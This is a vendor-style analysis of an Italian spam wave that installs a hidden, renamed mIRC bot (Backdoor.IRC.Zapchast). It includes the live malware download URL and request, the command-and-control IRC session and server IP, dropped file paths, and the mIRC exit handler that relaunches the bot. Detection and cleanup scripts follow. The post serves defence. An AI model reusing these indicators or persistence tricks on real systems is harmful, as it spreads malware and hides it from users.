C’e’ una Cartolina per te! = Backdoor.IRC.Zapchast

We have noticed new waves of spam messages, this time in Italian only, built around a "Happy Easter" greeting (Buona Pasqua). They contain malicious links that redirect the user to download a file named BuonaPasqua.gif.exe, detected as Backdoor.IRC.Zapchast, which behaves as an IRC bot.

[Screenshot: the spam e-mail]

Email headers:

Sender: Cartoline.Net
Subject: C’e’ una Cartolina per te! (Italian for "There is a postcard for you!")
Received: from naut2004.kultunaut.dk (1903ds1-by.1.fullrate.dk)
IP Address: 90.184.81.220

The malicious link in the message points to http://194.79.14.129/~nikolai/BuonaPasqua.gif.exe; note the double extension, meant to pass the executable off as an image. The request and the start of the server's response:

GET /~nikolai/BuonaPasqua.gif.exe HTTP/1.0
Host: 194.79.14.129
Pragma: no-cache

HTTP/1.1 200 OK
Date: Fri, 19 Mar 2010 22:40:41 GMT

When the file is executed, it displays a decoy image file named xmas.jpg:

[Screenshot: the decoy image xmas.jpg]

At the same time a process named spoolsv.exe (the name of the legitimate Windows print spooler) tries to connect to a remote server, and the Windows Firewall raises an alert:

[Screenshot: Windows Firewall alert for spoolsv.exe]

Network traffic (the new process connects to an IRC server on port 6667; the infected host's address is masked as XXX.XXX.XXX.XXX):

Protocol          : TCP
Remote Address    : 200.174.131.226
Remote Port       : 6667
 
NICK kijo
NOTICE AUTH :*** Looking up your hostname
NOTICE AUTH :*** Checking Ident
 
USER henryett "" "200.174.131.226" :pingo
NOTICE AUTH :*** No ident response
 
SILENCE +*!*@*
MODE kijo +iwx
NOTICE AUTH :*** Couldn't look up your hostname
PING :74643361
:my.server.name 451 kijo SILENCE :Register first.
:my.server.name 451 kijo MODE :Register first.
:my.server.name 001 kijo :Welcome to the Internet Relay Network icyg
:my.server.name 002 kijo :Your host is my.server.name, running version beware1.5.7
:my.server.name 003 kijo :This server was created Tue Jul 13 2004 at 20:36:17 GMT
:my.server.name 251 kijo :There are 1 users and 9 invisible on 1 servers
:my.server.name 252 kijo 1 :operator(s) online
:my.server.name 254 kijo 2 :channels formed
:my.server.name 255 kijo :I have 10 clients and 0 servers
:my.server.name NOTICE kijo :Highest connection count: 14 (14 clients)
:my.server.name 422 kijo :MOTD File is missing
 
:kijo!~bijaikos@XXX.XXX.XXX.XXX JOIN :#bran
:my.server.name 353 kijo = #bran :kijo @Bran @sullyc @batmanv @bassemd @eviaq @daiseyx
:my.server.name 366 kijo #bran :End of /NAMES list.
 
:Bran!~lonut@Bran.ro MODE #bran +o kijo 
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giova a
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giovy a
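Reading the session: the client sends SILENCE and MODE before the server has accepted its registration, so both are refused with 451 ("Register first"), a sign of a scripted rather than interactive client; MODE +iwx makes the bot invisible, subscribes it to wallops and hides its host; once it joins #bran the operator Bran immediately ops it and starts issuing dot-prefixed commands, which the mIRC scripts on the infected machine interpret. As an added example, not part of the original post, the Python script below parses a capture of this exchange (reduced to a constructed sample, with the assumed prefixes `C> ` and `S> ` marking direction) and reports those indicators:

```python
"""Heuristic scan of a captured IRC session for bot-like behaviour.

Added example, not from the original post. The sample is a constructed,
condensed copy of the session above; 'C> ' marks client->server lines and
'S> ' server->client lines (an assumed capture format, not a real one).
"""
import re

SAMPLE_CAPTURE = """\
C> NICK kijo
C> USER henryett "" "200.174.131.226" :pingo
C> SILENCE +*!*@*
C> MODE kijo +iwx
S> :my.server.name 451 kijo SILENCE :Register first.
S> :my.server.name 451 kijo MODE :Register first.
S> :my.server.name 001 kijo :Welcome to the Internet Relay Network icyg
S> :my.server.name 422 kijo :MOTD File is missing
S> :kijo!~bijaikos@XXX.XXX.XXX.XXX JOIN :#bran
S> :Bran!~lonut@Bran.ro MODE #bran +o kijo
S> :Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giova a
S> :Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giovy a
"""

# [:prefix] COMMAND [params]  (RFC 1459 line shape)
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<command>\S+)(?: (?P<rest>.*))?$")


def parse_irc_line(line):
    """Split an IRC line into (prefix, COMMAND, params); None if malformed."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    rest = m.group("rest") or ""
    if rest.startswith(":"):                  # only a trailing parameter
        params = [rest[1:]]
    else:
        head, sep, trailing = rest.partition(" :")
        params = head.split()
        if sep:
            params.append(trailing)
    return m.group("prefix"), m.group("command").upper(), params


def nick_of(prefix):
    """'Bran!~lonut@Bran.ro' -> 'Bran'; a bare server name is returned as-is."""
    return prefix.split("!", 1)[0] if prefix else ""


def scan_session(capture):
    """Return the list of indicators found in a 'C> '/'S> ' capture."""
    findings = []
    registered = False                        # set once the server sends 001
    for raw in capture.splitlines():
        direction, _, line = raw.partition(" ")
        parsed = parse_irc_line(line)
        if direction not in ("C>", "S>") or parsed is None:
            continue
        prefix, cmd, params = parsed
        if direction == "C>":
            # A human client cannot type commands before the welcome arrives.
            if cmd in ("SILENCE", "MODE") and not registered:
                findings.append(f"client sent {cmd} before registration (scripted, not interactive)")
            if cmd == "SILENCE" and params and params[0] == "+*!*@*":
                findings.append("SILENCE +*!*@* : client silences every private message")
            if cmd == "MODE" and len(params) >= 2 and params[1].startswith("+") and "i" in params[1]:
                findings.append(f"user mode {params[1]}: client hides from WHO/NAMES")
            continue
        # server -> client
        if cmd == "001":
            registered = True
        elif cmd == "451" and len(params) >= 2:
            findings.append(f"server rejected {params[1]} with 451 (command queued before 001)")
        elif cmd == "MODE" and len(params) >= 3 and params[1] == "+o":
            findings.append(f"{nick_of(prefix)} gave channel op (+o) to {params[2]} on {params[0]}")
        elif cmd == "PRIVMSG" and len(params) >= 2 and params[0].startswith("#") and params[1].startswith("."):
            findings.append(f"dot-command from {nick_of(prefix)} in {params[0]}: {params[1]}")
    return findings


if __name__ == "__main__":
    for finding in scan_session(SAMPLE_CAPTURE):
        print(finding)
```

Any one of these indicators alone is weak (a paranoid user may well set +i), but the combination of pre-registration commands, a blanket SILENCE, an immediate +o from an operator and dot-prefixed channel traffic is the signature of a scripted bot rather than a person, and the same checks can be run over a full pcap export once the lines are split by direction.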

Details on the IRC operator "Bran" (WHOIS and WHOWAS replies):

WHOIS Bran
:my.server.name 311 kijo Bran ~lonut Bran.ro * :B
:my.server.name 319 kijo Bran :#bran
:my.server.name 312 kijo Bran my.server.name :I'm too lazy to edit ircd.conf
:my.server.name 313 kijo Bran :is an IRC Operator
:my.server.name 317 kijo Bran 622 1269018316 :seconds idle, signon time
:my.server.name 318 kijo Bran :End of /WHOIS list.
 
WHOWAS Bran
:my.server.name 314 kijo Bran ~lonut bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 15:03:19 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 14:04:23 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 13:57:47 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 11:43:16 2010
:my.server.name 369 kijo Bran :End of WHOWAS

The file spoolsv.exe turns out to be the executable of the legitimate mIRC client, but something is odd: why is there no icon in the system tray? Inspecting the files shows that the authors replaced mirc.ico with an empty icon, so the running client becomes "invisible" in the tray:

[Screenshot: the emptied mirc.ico]

Now let's open the hidden mIRC window and see what it looks like:

[Screenshot: the hidden mIRC window]

It is the legitimate mIRC, but tampered with: the background of every chat window has been set to white to obscure the content. A simple change of colours makes it readable again:

[Screenshot: mIRC chat windows with colours restored]

Useful information can be found in the hidden files in the same folder as spoolsv.exe. users.ini lists the users allowed to control the hidden mIRC started on the infected machine:

[Screenshot: users.ini]

Two more files are worth noting: a.reg, which adds the registry keys needed to start the hidden mIRC at every reboot, and run.bat, which imports a.reg and launches the hidden mIRC (spoolsv.exe):

[Screenshot: a.reg and run.bat]

All files created by the malicious BuonaPasqua.gif.exe:

C:\WINDOWS\Temp\spoolsv
C:\WINDOWS\Temp\spoolsv\a.reg
C:\WINDOWS\Temp\spoolsv\aliases.ini
C:\WINDOWS\Temp\spoolsv\control.ini
C:\WINDOWS\Temp\spoolsv\mirc.ico
C:\WINDOWS\Temp\spoolsv\mirc.ini
C:\WINDOWS\Temp\spoolsv\remote.ini
C:\WINDOWS\Temp\spoolsv\run.bat
C:\WINDOWS\Temp\spoolsv\servers.ini
C:\WINDOWS\Temp\spoolsv\spoolsv.exe
C:\WINDOWS\Temp\spoolsv\users.ini
C:\WINDOWS\Temp\spoolsv\s.mrc
C:\WINDOWS\Temp\spoolsv\com.mrc
C:\WINDOWS\Temp\spoolsv\xmas.jpg
C:\WINDOWS\Temp\spoolsv\logs
C:\WINDOWS\Temp\spoolsv\sounds
C:\WINDOWS\Temp\spoolsv\download

The script file com.mrc also contains a "restart on exit" handler, which relaunches spoolsv.exe whenever mIRC is closed:

on *:exit: { /run $mircexe | halt }
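Putting the artefacts together (a copy of mIRC named after the print spooler, dropped under C:\WINDOWS\Temp, started from a Run value written by a.reg, with an exit handler that relaunches it), the Python triage below checks a snapshot of a host for those conditions and derives the order in which to remove them. It is an added example, not the original post's or Threat Killer's code; the process list, Run values and file list are a constructed snapshot modelled on the artefacts above, and the name of the Run value (`spoolsv`) is an assumption, since the post does not show the contents of a.reg.

```python
"""Offline triage for a hidden-mIRC infection (added example, not from the post).

Works on a constructed snapshot instead of the live process table, registry
and file system so it runs anywhere; replace the three constants with data
collected from the suspect host.
"""
from pathlib import PureWindowsPath

# spoolsv.exe (the print spooler) legitimately lives only in these folders.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Configuration files a mIRC installation always carries next to its executable.
MIRC_ARTEFACTS = {"mirc.ini", "remote.ini", "users.ini", "aliases.ini", "servers.ini"}
# Path fragments typical of user-writable folders used as drop locations.
DROP_LOCATION_HINTS = ("\\temp\\", "\\appdata\\", "\\documents and settings\\")

# --- constructed snapshot, modelled on the artefacts listed above ---
PROCESSES = [
    r"C:\WINDOWS\system32\spoolsv.exe",       # the real print spooler
    r"C:\WINDOWS\Temp\spoolsv\spoolsv.exe",   # the renamed mIRC
    r"C:\WINDOWS\explorer.exe",
]
RUN_VALUES = {                                # ...\CurrentVersion\Run; value name assumed
    "spoolsv": r"C:\WINDOWS\Temp\spoolsv\run.bat",
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
}
FILES = [
    r"C:\WINDOWS\Temp\spoolsv\a.reg",
    r"C:\WINDOWS\Temp\spoolsv\mirc.ini",
    r"C:\WINDOWS\Temp\spoolsv\remote.ini",
    r"C:\WINDOWS\Temp\spoolsv\run.bat",
    r"C:\WINDOWS\Temp\spoolsv\spoolsv.exe",
    r"C:\WINDOWS\Temp\spoolsv\users.ini",
    r"C:\WINDOWS\Temp\spoolsv\com.mrc",
    r"C:\WINDOWS\system32\spoolsv.exe",
]


def _parent(path):
    """Lower-cased parent directory of a Windows path."""
    return str(PureWindowsPath(path).parent).lower()


def masquerading_spoolsv(processes):
    """Processes named spoolsv.exe that do not run from a system directory."""
    return [p for p in processes
            if PureWindowsPath(p).name.lower() == "spoolsv.exe"
            and _parent(p) not in SYSTEM_DIRS]


def mirc_dirs(files):
    """Directories that contain mIRC configuration files."""
    names_by_dir = {}
    for f in files:
        names_by_dir.setdefault(_parent(f), set()).add(PureWindowsPath(f).name.lower())
    return sorted(d for d, names in names_by_dir.items() if names & MIRC_ARTEFACTS)


def suspicious_run_values(run_values):
    """Autostart entries whose target sits in a user-writable drop location."""
    return {name: target for name, target in run_values.items()
            if any(h in target.lower() for h in DROP_LOCATION_HINTS)}


def triage(processes, run_values, files):
    """Collect the indicators and the order in which to remove them.

    The process is killed first: mIRC's 'on *:exit' handler only runs on a
    normal exit, so terminating the process (rather than closing the window)
    skips the relaunch, and the folder cannot be deleted while its executable
    is still running. The Run value goes next so a reboot cannot bring it back.
    """
    procs = masquerading_spoolsv(processes)
    runs = suspicious_run_values(run_values)
    dirs = mirc_dirs(files)
    steps = [f"kill process {p}" for p in procs]
    steps += [f"delete Run value '{name}' -> {target}" for name, target in runs.items()]
    steps += [f"delete folder {d}" for d in dirs]
    return {"processes": procs, "run_values": runs, "mirc_dirs": dirs, "cleanup": steps}


if __name__ == "__main__":
    for step in triage(PROCESSES, RUN_VALUES, FILES)["cleanup"]:
        print(step)
```

The path comparison is deliberately done on the parent directory rather than on a substring, so that a copy at C:\WINDOWS\system32\spoolsv\spoolsv.exe (a sub-folder with a plausible name) is still reported.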

To remove this threat from an infected system we can use a simple script executed with our free tool Threat Killer. Keep in mind that the running spoolsv.exe process has to be terminated before the folder can be deleted (closing it normally would trigger the exit handler in com.mrc and restart it), and that the registry value added by a.reg should be removed as well, since the script below only deletes the folder:

[DELETE FOLDERS RECURSIVE]
C:\WINDOWS\Temp\spoolsv\
[/END]

Output:

[Screenshot: Threat Killer output]
